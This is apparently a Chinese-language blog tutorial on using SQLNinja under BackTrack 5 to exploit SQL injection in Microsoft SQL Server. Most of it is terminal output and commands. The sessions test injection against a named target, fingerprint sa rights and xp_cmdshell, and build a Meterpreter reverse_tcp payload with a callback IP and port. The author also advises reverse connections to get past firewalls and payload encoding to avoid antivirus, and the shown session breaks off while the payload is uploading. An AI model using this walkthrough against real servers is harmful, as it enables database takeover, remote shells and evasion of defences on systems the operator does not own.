最近在學習BackTrack 5下滲透測試,剛好在學習SQLMap和SQLNinja,以下是SQLNinja的用法,SQLMap的用法見之前的博客。
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m
Usage: ./sqlninja
-m <mode> : Required. Available modes are:
t/test - test whether the injection is working
f/fingerprint - fingerprint user, xp_cmdshell and more
b/bruteforce - bruteforce sa account
e/escalation - add user to sysadmin server role
x/resurrectxp - try to recreate xp_cmdshell
u/upload - upload a .scr file
s/dirshell - start a direct shell
k/backscan - look for an open outbound port
r/revshell - start a reverse shell
d/dnstunnel - attempt a dns tunneled shell
c/sqlcmd - issue a 'blind' OS command
m/metasploit - wrapper to Metasploit stagers
-f <file> : configuration file (default: sqlninja.conf)
-p <password> : sa password
-w <wordlist> : wordlist to use in bruteforce mode (dictionary method
only)
-v : verbose output
-d <mode> : activate debug
1 - print each injected command
2 - print each raw HTTP request
3 - print each raw HTTP response
all - all of the above
...see sqlninja-howto.html for details
上面這麼多參數,我們一一解釋
./sqlninja -m 加載modle
下面是一些模塊參數
-t/test 測試當前模塊和配置文件是否工作正常
./sqlninja -m test
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !!
ok,測試成功,表明當前注射點可以識別,存在注入漏洞。
f/fingerprint - fingerprint user, xp_cmdshell and more 這個是判斷數據庫類型,當前用戶,xpcmdshell是否存在可以用。
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
a - All of the above
h - Print this menu
q - exit
>
0 檢測當前數據庫版本
1 當前數據庫用戶
2 當前數據庫用戶權限
3 檢查xp_cmdshell是否可以用
4 是否windows本地系統權限
a 檢查上面所有的
h顯示當前幫助菜單
1 退出
> a
[+] Checking SQL Server version...
Target: Microsoft SQL Server 2000
[+] Checking whether we are sysadmin...
We seem to be 'sa'
[+] Checking whether xp_cmdshell is available
xp_cmdshell seems to be available
Mixed authentication seems to be used
>
m/metasploit 使用metasploit裡面的shellcode,這個默認是沒有啟用的,需要修改sqlninja.conf中metasploit配置位置修改
# Path to metasploit executable. Only needed if msfpayload and
# msfcli are not already in the path
msfpath = /pentest/exploits/framework3/ #去掉前面的注釋符號,這裡修改成你的framework3的安裝位置
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m metasploit
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <[email protected]>
[+] Parsing configuration file................
[+] Evasion technique(s):
- query hex-encoding
- comments as separator
- random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Entering Metasploit module. In order to use this module you need to
have found an available TCP port, either inbound or outbound
[+] Checking Metasploit3 availability....
[+] Which payload you want to use?
1: Meterpreter
2: VNC
>
這裡執行metasploit,因為調用了metasploit裡面的payload,其中有兩種方式,一種是Meterpreter,一種是vnc反向鏈接,如果是在console下面推薦使用Meterpreter,如果是在GNOME或者其他視窗環境下推薦使用VNC,(這裡要說一下,必須你機器上要裝vncserver,經過測試證實,不能正確的調用metasploit裡面的vncserver)
OK,我們把兩種方法都測試一下。首先執行Meterpreter
> 1
[+] Which type of connection you want to use?
1: bind_tcp
2: reverse_tcp
>
這裡要我們選擇連接方式,1 是bind_tcp,在服務器上bind一個端口,2.reverse_tcp,反向鏈接到本地。考慮到服務器上有防火牆之類的,我們一般推薦2,但是如果你沒有外網IP或者外網VPN,推薦使用bind_tcp
這裡我們選擇2
> 2
[+] Enter local port number
> 443
這裡需要我們輸入一個本地一個端口,推薦使用未被占用的端口,這裡輸入443
[+] Choose a payload encoding method
0 - none
1 - Alpha2 Alphanumeric Mixedcase
2 - Alpha2 Alphanumeric Uppercase
3 - Avoid UTF8/tolower
4 - Call+4 Dword XOR
5 - Single-byte XOR Countdown
6 - Variable-length Fnstenv/mov Dword XOR
7 - Polymorphic Jump/Call XOR Additive Feedback
8 - Non-Alpha
9 - Non-Upper
10 - Polymorphic XOR Additive Feedback
11 - Alpha2 Alphanumeric Unicode Mixedcase
12 - Alpha2 Alphanumeric Unicode Uppercase
>
這裡要你輸入shellcode的加密方式,主要是為了避免被服務器上的殺毒軟件查殺。這裡可根據實際條件選擇,我選擇0
[+] Calling msfpayload3 to create the payload...
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: exitfunc=process,lport=443,lhost=211.45.123.200
[+] Payload (met50838.exe) created. Now converting it to debug script
[+] Uploading /tmp/met50838.scr debug script............
